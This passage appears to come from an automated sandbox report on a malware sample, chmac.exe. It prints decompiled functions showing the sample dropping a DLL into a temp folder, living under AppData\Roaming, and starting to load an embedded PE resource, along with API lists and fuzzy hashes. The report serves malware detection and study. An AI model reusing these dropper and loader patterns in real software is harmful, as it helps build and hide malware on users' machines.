				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}

0x00405579
0x00405590
0x00405598
0x00405598
0x004055a0

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
lstrcatA.KERNEL32(?,0040900C), ref: 00405598

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405578

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3916508600
Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024aa
0x00401561
0x00402825
0x00402880
0x0040288c

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F

Uniqueness

Uniqueness Score: -1.00%

Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040209D

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-501415292
Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404D73, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}

APIs

IsWindowVisible.USER32 ref: 00404DA9
CallWindowProcA.USER32 ref: 00404E17

Part of subcall function 00403E83: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403E95

Strings

, xrefs: 00404D81

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsx3DC5.tmp\esrskf.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp\esrskf.dll,00000000,?,?,00000000,00000011), ref: 004024ED

Strings

C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp\esrskf.dll, xrefs: 004024BC, 004024E1

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp\esrskf.dll
API String ID: 427699356-1566811445
Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004055BF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x004055c0
0x004055ca
0x004055cc
0x004055d3
0x004055db
0x00000000
0x00000000
0x00000000
0x004055db
0x004055dd
0x004055e2

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming\dihsw,00402CC7,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,80000000,00000003), ref: 004055C5
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Roaming\dihsw,00402CC7,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,80000000,00000003), ref: 004055D3

Strings

C:\Users\user\AppData\Roaming\dihsw, xrefs: 004055BF

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\AppData\Roaming\dihsw
API String ID: 2709904686-3661263113
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9

Uniqueness

Uniqueness Score: -1.00%

Function 004056D1, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x004056dd
0x004056df
0x00405707
0x004056ec
0x004056f1
0x004056fc
0x00000000
0x00405719
0x00405705
0x00405705
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: chmac.exe PID: 6556 Parent PID: 6288 chmac.exeCOMMON

Executed Functions

Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}

0x00401e22
0x00401e28

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22

Memory Dump Source

Source File: 0000000E.00000001.325106635.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 04883850, Relevance: .8, Instructions: 758COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25450f6dc07e7ef43120b9839c93f8e92df77499e88139a7e9aa13b0e7f72824
Instruction ID: 9557620773dfbca226013418d58b295cfbf16ffd6e834d79ca9dbccf0fcd0633
Opcode Fuzzy Hash: 25450f6dc07e7ef43120b9839c93f8e92df77499e88139a7e9aa13b0e7f72824
Instruction Fuzzy Hash: AF52E331A0414ACFCB15EF68C8849A9FBB2FF85704B198AA9D805DF212D772FD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 048823A0, Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a881f91d5f6b8d2c731d23c348a1877fd19ec49c491a564a9e4d164375e248
Instruction ID: 6ae6129d56f26a93bb312ec6b79d60fc2d8ccf96b7aeff7e278434cc7306c1e6
Opcode Fuzzy Hash: a0a881f91d5f6b8d2c731d23c348a1877fd19ec49c491a564a9e4d164375e248
Instruction Fuzzy Hash: B212E230A04219CFC724EF29C98466DB7F2BF84305F54CAADD416EB255EB78A886DF50

Uniqueness

Uniqueness Score: -1.00%

Function 04882FA8, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42cf64a606d8b0daeab61846030144d2d8f3906fdbc5a61f72cad47995eade0d
Instruction ID: c3e0c9b485d73c84538af089511388ced2cd6556829e68d4bd2cd2bb35bde223
Opcode Fuzzy Hash: 42cf64a606d8b0daeab61846030144d2d8f3906fdbc5a61f72cad47995eade0d
Instruction Fuzzy Hash: 4F81E231F001199BC714EB68D954A6EB7F3AFC4710F2A8578E815EB365EE35EC018B90

Uniqueness

Uniqueness Score: -1.00%

Function 0488238F, Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.341504232.0000000004880000.00000040.00000001.sdmp, Offset: 04880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4880000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76ee3b9ade0ea0210e206c7be978de51dd98cb461a154c2dd8a583a8a66a2a7e
Instruction ID: bd87524bf2a57747c3e74d002d5a6d9cc44db9565bc585c10e9c5b4ac4a27ca3
Opcode Fuzzy Hash: 76ee3b9ade0ea0210e206c7be978de51dd98cb461a154c2dd8a583a8a66a2a7e
Instruction Fuzzy Hash: E791A030A1824ACFD725EF25C554769BBF2BF44308F10CAADC406DB261EB78A94ADF51

Uniqueness

Uniqueness Score: -1.00%

Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
